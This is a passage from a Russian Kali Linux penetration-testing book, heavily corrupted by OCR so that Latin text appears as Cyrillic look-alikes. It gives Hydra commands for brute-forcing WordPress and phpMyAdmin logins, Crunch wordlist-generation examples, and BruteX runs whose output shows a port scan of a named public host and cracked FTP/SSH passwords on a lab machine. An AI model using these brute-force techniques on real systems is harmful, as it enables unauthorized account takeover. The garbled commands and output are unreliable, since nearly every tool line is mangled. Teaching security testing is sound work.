Т.е. данные передаются на страницу ѵѵр-Іо§іп.рИр 


Там же можно увидеть и метод: 


1| 

КециеБІ: МеШосЕРОБТ 

Посмотрев на страницу видим, при неверных учётных данных в ответе присутствует 
слово «ОШИБКА». Тем не менее, не нужно сильно наедятся, что программа правильно 
будет работать с русскими буквами. Надежнее посмотреть НТМІ. код и найти там что- 
нибудь характерное на латинице, например — Іо§іп_еггог. 

Теперь можно составить окончательный запрос для брутфорса ѴѴогсІРгезз с Иусіга: 

1| 

Нусіга -1 111111 -р 222222 Шр-ро5Ыюгт://по1:\л/еЬ\л/аге.ЬІ2 -т "/ѵѵр- 
Іо§іп.рІір:Іо§= л и5ЕК л &рѵѵсІ= л РА55 л &гететЬегте=1 : огеѵег&\л/р- 

5иЬтіГ=%00%92%00%ВЕ%00%В9%01%82%00%В8&гесІігесГ_Го=Іі«р%ЗА%2Р%2Р\л/еЬѵѵаг 

е.ЬІ2%2Р\л/р-асітт%2Р&1:е$1:соокіе=1:Іо§іп_еггог" 


Этот алгоритм является рабочим. Но на практике бывают исключения. Например, при 

попытке брутфорсить свой собственный сайт у меня появляется ошибка сервера 503. 

Хотя на других сайтах вполне работает. 
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Взлом пароля для рНрМуАсІтіп с Ьусіга 


Есть хорошая и плохая новости. Хорошая новость заключается в том, что я уже 
подготовил примерную строку для перебора паролей в рНрМуАбтіп: 


1 | 


Нусіга -I гооі: -е п ННр-розМопгк/ДЭг. 168.1.33 -т 

"/рНрМуАсІтіп/іпсІех.рНр:рта_и5етате= Л ІІ5ЕК Л &рта_ра55\л/огсІ= Л РА55 Л &5егѵ 
ег=1:5=т^огта1:юп зсНета" 


Но есть и плохая новость. Эта строка никак не хотела работать на моём сервере в 
отношении самой последней версии рНрМуАбтіп. Я повозился с режимом отладки и 
выяснил, что причина в защите от С1іск.1аскіп§, это сделано путём отключения 
фрейминга (возможности вставки страниц во фреймы). В коде рНрМуАсІтіп так и 
написано: 


1| 

/* Ргеѵепі: а§аіп$1: СІісІсІаскіп§ Ьу сІІ5аЫіп§ 1татіп§ */ 

21 

іЕ (! $ С Ю В А ЬБ [' сТ§' ] [' А 11 о\л/ТИ і гсі Р а гТу Р га т і п §' ]) { 

3| 

НеасІег( 

4| 

'Х-Ргате-Орбопз: ОЕМУ 

51 

); 

6| 

} 


Т.е. в рНрМуАсІтіп есть защита от брутфорсинга гидрой. Конечно, эта опция должна 
быть включена (так и есть по умолчанию) и сервер должен быть настроен 
соответствующим образом. 


Т.е. налицо простая и эффективная защита от брутфорсинга (хотя, говорят, это можно 
обойти)... 


Помощь по модулям НПр-веІ и НПр-розІ 

Оба этих модуля требуют страницу для аутентификации 

Пример: "/зесгеі" или "Н«р://Ыа.сотДоо/Ьаг" или "И«р5://іе$1.сот:8080/тетЬег5" 


Глава 61. СгипсИ — генератор паролей: основы использования и 
практические примеры 

Что такое СгипсИ 

СгипсИ — генератор словарей паролей, в которых можно определить стандартную или 
заданную кодировку. СгипсИ может произвести все возможные комбинации и 
перестановки. 

Особенности: 

• сгипсИ генерирует списки слов (ѴѴогсПізІ) как методом комбинации, так и 
методом перестановки 

• он может разбить вывод по количеству строк или размеру файла 

• поддерживается возобновление процесса после остановки 

• образец (паттерн) поддерживает числа и символы 
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• образец поддерживает по отдельности символы верхнего и нижнего регистра 

• работая с несколькими файлами, выводит отчёт о статусе 

• новая опция -I для буквальной поддержки, @,% Л 

• новая опция -б для ограничения дублирования символов, смотрите тап-файл 
для деталей 

• поддержка ипісобе 

В методах взламывания пароля, ѴѴогсШзІ (список слов) — один из самых важных 
файлов. В этом списке созданы все возможные комбинации пароля. 

Методы взламывания пароля бывают: 

1. Оісііопагу аНаск 

Перебор по словарю. Словари содержат наиболее часто используемые пароли. 
Плюсами данной атаки является повышение шанса подобрать пароль при 
значительной экономии времени. Минус — не даёт 100% уверенности в подборе 
пароля. 

2. Вгиіе Рогсе АНаск 

Плюс — если перебрать все возможные комбинации, то можно говорить 100% 
уверенности о взломе пароля. Минус — необходимость большого количества ресурсов 
(вычислительных мощностей и времени). 

3. НуЬгіб АМаск 

Работа ведётся по словарю, но добавляются некоторые числа и символы к словам. 

4. ЗуІІаЫе АНаск 

Это — комбинация Ьгіііе Іогсе аНаск и бісііопагу аНаск. 

5. Риіе-Вазеб АНаск 

Нападение, основанное на правилах. Используется, когда нападавший получает 
некоторую информацию о пароле. 

Использование сгипсИ 


Простой пример использования: 

сгипсЬ <минимальная-длина> <максимальная-длина> [набор символов] 


Например: 


1 


сгипсіі 3 7 аЬсбеР 


Этот пример создаст все пароли от 3 до 7 символов, содержащих символы 'аЬсбеГ в 
качестве набора символов и выведет всё это в стандартный вывод. 


Ещё один пример: 


1 


сгипсіі <минимальная-длинна> <максимальная длина> [4 <путь до сбаг5е1:.І5І:> имя- 
набора-символов] [-о ѵѵогсііібТ.Тхі: или 5ТАКТ] [-1 [НХЕ0]@@@(5)] [-5 ${аг1:Ыоск] 
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• @ означает символы в нижнем регистре 

• , означает символы в верхнем регистре 

• % означает цифры 

• Л означает разные символы, общим количеством 33. Вы можете посмотреть их 
командой: 


1 


сгипсіі 11 -1 Л 


Как создать словарь в сгипсН 


Перейдите в Приложения > Каіі Ыпих > Раззѵѵогсі АМаскз > СИТІіпе АНаскз > сгипсЬ 
Или введите в Терминале: 


1 


сгипсіі 


Правила для создания словаря. 

сгипсб <тіп> <тах> <сЬагзе1:> -I <раНегп> - о <ЯІепате.І5І:> 
Где, 


• тіп = минимальное количество символов в паролях словаря 

• тах = максимальное количество символов в паролях словаря 

• сГіагзеі = символы, которые хотите добавить в пароли в словаре. Например: 
аЬссІ или 123455 

• раііегп = образец пароля. Например хотите создать словарь вида дэ*******, 
т.е. первые две цифры будут статические и последние цифры — переменными. 

Например, я хочу создать словарь из минимум 10 цифр, максимум 10 цифр, с 
символами аЬссІ987 и образцом аЬс@@@@@@@ с последующим сохранением файла 
словаря на рабочем столе. 


Вводим в терминале: 


1 


сгипсіі 10 10 аЬссі987 -I а-о /гооі/РезкІор/ІіІе.ІхІ: 


Это создаст 823543 комбинаций пароля. 


і ■ і. . ; і -I ,І.і :~# сгипсЬ 10 10 аЬссІ987 -1 аЬс@@@@(а@@ 

Сгипсіі міП. пом депегаТе 1:1іе 'ГоІТоміпд атоипі сГ сіаіа: 9058973 Ьуіез 
8 МВ 
0 СВ 
0 ТВ 
0 РВ 

Сгипсіі мііі пом депегаіе ТНе -роііоміпд питЬег оТ Ііпез: 823543 

аЬсааааааа 

аЬсааааааЬ 

аЬсаааааас 

аЬсаааааасІ 

аЬсааааааЭ 

аЬсааааааЭ 

аЬсаааааа7 

аЬсаааааЬа 

аЬсаааааЬЬ 

аЬсаааааЬс 

аЬсаааааЬсІ 

аЬсаааааЬЭ 

аЬсаааааЬ8 

аЬсаааааЬ7 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


345 












Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Примеры использования сшпсН 


Пример 1 


1 


сгипсіі 1 8 


СгипсЬ отобразит список слов, который начинается с а и заканчивается на 22222222 

Пример 2 


1 


сгипсіі 1 6 аЬс<М§ 


Сгипсіі отобразит список слов, в паролях которого используется набор аЬссІе^ который 
начинается на а и заканчивается §§§§§§ 


Пример 3 


1 


сгипсіі 1 6 аЬс<М§\ 


В конце строки есть символ пробела. Чтобы сшпсб мог использовать пробел, вам 
нужно экранировать его, поставив перед ним символ \. В этом примере вы можете 
также использовать кавычки вокруг букв тогда вам не нужен \, например "аЬссІе^ ". 
СгипсЬ отобразит список слов, использующих набор символов аЬссІе^ , который 
начинается на а, а заканчивается на шесть пробелов. 


Пример 4 


1 


сгипсіі 1 8 Т сІіагзеСІзІ: тіхаірііа-пипіегіс-аіі-зрасе -о ѵѵогсПібТ.Тхі; 


Сгипсіі будет использовать набор символов тіхаірііа-питегіс-аіі-зрасе из сЬагзеТ.ІзІ; и 
выведет сгенерированные пароли в файл с названием ѵѵогсііізСШ. Этот файл начнётся с 
а и закончится на "" 


Пример 5 


1 


сгипсіі 8 8 Т сІіагзеСІзІ: тіхаірііа-питегіс-аіі-зрасе -о ѵѵогсііізі.іхі: -I @@сіо§@@@ -5 
сЫо§ааа 


Сгипсіі сгенерирует восьмисимвольный список слов, используя набор символов 
тіхаІрІіа-питЬег-аІІ-зрасе сііагасіег зеі: из сІіагзеСІзІ и запишет список паролей в файл 
ѵѵогсііізі.Ш. Файл начнётся с сЬбо§ааа и закончится на " сіо§ " 


Глава 62. ВгиіеХ: программа для автоматического брутфорса 
всех служб 

ВгиіеХ — это скрипт, автоматизирующий работу других программ (смотрите 
зависимости). И этот скрипт является прекрасным примером, для чего нужно изучать 
программирование шелл скриптов и как можно автоматизировать процесс анализа 
одной или многих целей. Как может проходить типичный анализ целевого сайта? 
Сканируем ІЧМар'ом открытые порты и определяем запущенные на целевом сервере 
службы. После этого, например, начинаем брутфорсить РТР, 55Н и другие службы с 
помощью НусІга и т. д. Нам нужно анализировать результаты работы предыдущих 
команд, вводить новые команды и т. д. Одновременно мы можем работать с одним 
сайтом. ВгиіеХ делает то же самое, но автоматически — сам сканирует, сам запускает 
брутфорсинг. Возможно массовое сканирование (с помощью Ьгиіех-шазззсап). 
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Т.е. ВгиіеХ проиозводит автоматический брутфорсинг всех служб, включая: 

• Открытые порты 

• ЭЫ5домены 

• Веб-файлы 

• Веб-директории 

• Имена пользователей 

• Пароли 
Загрузка ВгиІеХ: 


1 


§І1: сіопе Ы:1:р5://§М:ЬиЬ.сот/1МЗ/Вги1:еХ.§И: 


Использование ВгиІеХ: 


1 


./ЬгиТех Іаг§е1: 


Где Іаг§еІ — это целевой сайт или ІР. 


\ _ \ _ / |_ _ \ \/ / 

I I _А_ _ \ | \ _\/ _ \ \ / 

I I ѵ | | \/ | /| | \ / / \ 

I_ / І_І I_/ І_І \_ >_л \ 

\/ \/ \_/ 

+ -- --=[ВгиіѳХ ѵі.1 Ьу 1МЗ 
+ -- --=[іііір://сгоѵ»гсІ5Ьіѳ'Ісі.сот 


################################### Виппіпд Рогѣ 5сап ########################## 


Зіагііпд Nтар 6.47 ( Ьіір ://птар.огд ) аі 2015-07-13 05:19 М5К 
(\ітар зсап гѳрогі іо г ргозіоііпих . ги (185.58.207.192) 

Нозі із ир (0.28з Іаіѳпсу). 

№і зЬоѵ/п: 985 сіозѳсі рогіз, 3 ііііѳгѳсі рогіз 

РОВТ 5ТАТЕ 5ЕВѴІСЕ 

22/іср орѳп ззЬ 

25/іср орѳп зтір 

53/іср орѳп сіотаіп 

80/ѣср орѳп Ьіір 

110/іср орѳп рорЗ 

111/іср орѳп грсЬіпс! 

143/іср орѳп ітар 
465/іср орѳп зтірз 
587/іср орѳп зиЬтіззіоп 
993/іср орѳп ітарз 
995/іср орѳп рорЗз 
1500/іср орѳп ѵізі-іт 

Итар сіопѳ: 1 ІР асісігѳзз (1 Ьозі ир) зсаппѳсі іп 10.58 зѳсопсіз 

################################### Виппіпд Вгиіѳ Рогсѳ ############################ 

+ -- --=[Рогі 21 сіозѳсі... зкірріпд. 

+ -- --=[Рогі 22 орѳпѳсі... гиппіпд іѳзіз... 

Нусіга ѵ8.1 (с) 2014 Ьу ѵап Наизѳг/ТНС - Ріѳазѳ сіо поі изѳ іп тііііагу о г зѳсгѳі зѳгѵісѳ огдапігаііопз, о г іо г іііѳдаі ригрозѳз. 
Нусіга (Ьіір://ѵмѵ.іЬс .огд/іЬс-Ьусіга) зіагііпд аі 2015-07-13 05:19:15 

[\л/АРЧМІМС] Мапу 55Н сопіідигаііопз Іітіі іЬѳ питЬѳг оі рагаііѳі іазкз, іі із гѳсоттѳпсіѳсі іо гѳсіисѳ іЬѳ іазкз: изѳ -і 4 
[ЭАТА] тах 30 іазкз рѳг 1 зѳгѵѳг, оѵегаіі 64 іазкз, 117447 Іодіп ігіез (1:33/р:3559), ~61 ігіѳз рѳг іазк 
[ОАТА] аііаскіпд зѳгѵісѳ ззЬ оп рогі 22 

[5ТАТІІ5] 383.00 ігіѳз/тіп, 383 ігіѳз іп 0Ѳ:Ѳ1Ь, 117064 іосіо іп 05:06Ь, 30 асііѵѳ 

[5ТАТІІ5] 360.67 ігіѳз/тіп, 1082 ігіѳз іп ѲѲ:03Ь, 116365 іосіо іп 05:23Ь, 30 асііѵѳ 

[5ТАТІІ5] 332.00 ігіѳз/тіп, 2324 ігіѳз іп ѲѲ:07Ь, 115123 іосіо іп 05:47Ь, 30 асііѵѳ 

[5ТАТІІ5] 321.13 ігіѳз/тіп, 4817 ігіѳз іп 00:15Ь, 112630 іоЬо іп 05:51Ь, 30 асііѵѳ 


Зависимости: 

• ЫМар 

• Нубга 

• \Л/ііі22 

. ЗЫМРѴѴаІк 

• О N 5 О і сТ 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Для брутфорса множества хостов используйте ЬгиТех-тазззсап а сами ІР/имена хостов 
для сканирования запишите в файл Іаг§еІ5.Ш. 


Т 

I 


+ .. --=[ВгоТеХ ѵІ.О Ьу 1ЫЗ 
+ -- - -=[ЬТТр : //сгоѵсІзЬіеІс) . сот 


ЯЯяаЯЯЯЯЯЯаааяяяЯЯяаяяЯЯЯЯяааяяЯЯЯЯ Риппіпд Ро гі 5сап яяяяяяяяяяяяааяяяяяяяааяяяяяяя 

ЗТагТіпд Ишар 6.47 ( ЬТТр://птар.огд ) а* 2015-05-31 09:35 ЕОТ 
Итар зсап герогТ Тог 192.168.1.147 
НозТ І5 ир (0.0000745 ІаТепсу). 

№Т зЬоѵп: 983 сіозесі рогТз 
РОСТ 5ТАТЕ 5ЕРѴІСЕ 
21/Тср ореп ТТр 
22/Тср ореп гзЬ 
25/Тср ореп зтТр 
80/Тср ореп ІгЬТ: р 
139/Тср ореп пеТЬіоз-ззп 
443/Тср ореп ЬТТрз 
445/Т с р ореп тісгозоТТ-сіз 
512/Тср ореп ехес 
513/Тср ореп Іодіп 
514/Тср ореп гЬеІІ 
ббб/Тср ореп сіооі» 

ЗЗОб/Тср ореп тузчі 
5901/Тср ореп ѵпс-1 
6001/Тср ореп XII :1 
8080/Тср ореп ЬТТр-ргоху 
8443/Тср ореп ЬТТрз-аІТ 
9080/Тср ореп дігрс 

МАС Асісігезз: 00:00:29:98: АЕ:97 (ѴМѵаге) 

Итар сіопе: 1 ІР асісігезз (1 ЬозТ ир) зсаппесі іп 0.34 зесопсіз 

яяа=ааеяяааааеаяяа==ааяяяяа==ее«яяа Риппіпд ВгиТе Рогсе яяяаяяяяяяяаяяяяяяааяяяяяяаа 

+ .. --=[РогТ 21 орепесі... гиппіпд ТезТз... 

Нугіга ѵ8.2-с!еѵ (с) 2014 Ьу ѵап Наизег/ТНС - Ріеазе <Іо поТ изе іп гаіІіТагу ог зесгеТ зег 
Нусіга (ЬТТр://ѵѵѵ.ТЬс.огд/ТЬс-ЬусІга) зТагТіпд аТ 2015-05-31 09:35:58 

[ОАТА] шах 30 Тазкз рег 1 зегѵег, оѵегаІЛ 64 Таэкз, 1794 Іодіп Тгіез (1:69/р:2б), -О Тг 
[ОАТА] аТТаскіпд зегѵісе ТТр оп рогТ 21 

[2Ц[ТТр] ЬозТ: 192.168.1.147 Іодіп: Ьее раззѵогсі: Ьид 
[ЗТАТІІЗ] аТТаск ТіпізЬесІ Тог 192.168.1.147 (ѵаіісі раіг ТоипсІ) 

1 оТ 1 ТагдеТ зиссеззТиІІу сотрІеТесІ, 1 ѵаіісі раззѵогсі ТоипсІ 
Нусіга (ЬТТр://ѵѵѵ.ТЬс.огд/ТЬс-ЬусІга) ТіпізЬесІ аТ 2015-05-31 09:36:07 

+ -- --=[РогТ 22 орепесі... гиппіпд ТезТз... 

Нусіга ѵ8.2-с!еѵ (с) 2014 Ьу ѵап Наизег/ТНС - Ріеазе <Іо поТ иге іп тіІіТагу ог зесгеТ зег 
Нусіга (ЬТТр://ѵѵѵ.ТЬс.огд/ТЬс-ЬусІга) зТагТіпд аТ 2015-05-31 09:36:07 

[ѴѴАРТІІМС] Мапу 55Н сопТідигаТіопз ІіиіТ ТЬе питЬег оТ рагаііеі Тазкз, ІТ із гесоттепсіес) 
[ОАТА] тах 30 Тазкз рег 1 зегѵег, оѵегаіі 64 Тазкз, 1794 Іодіп Тгіез (1:69/р:26), ~0 Тг 
[ОАТА] аТТаскіпд гегѵісе ззЬ оп рогТ 22 

[22][ззМ ЬозТ: 192.168.1.147 Іодіп: Ьее раззѵогсі: Ьид 
[ЗТАТІІЗ] аТТаск ТіпізЬесІ Тог 192.168.1.147 (ѵаіісі раіг ТоипсІ) 

1 оТ 1 ТагдеТ зиссеззТиІІу сотрІеТесІ, 1 ѵаіісі раззѵогсі ТоипсІ 
Нусіга (НТТр://ѵѵѵ.ТЬс.огд/ТЬс-ЬусІга) ТіпізЬесІ аТ 2015-05-31 09:36:19 

+ -- --=[РогТ 23 сіозесі... зкірріпд. 

__I___I_._ 
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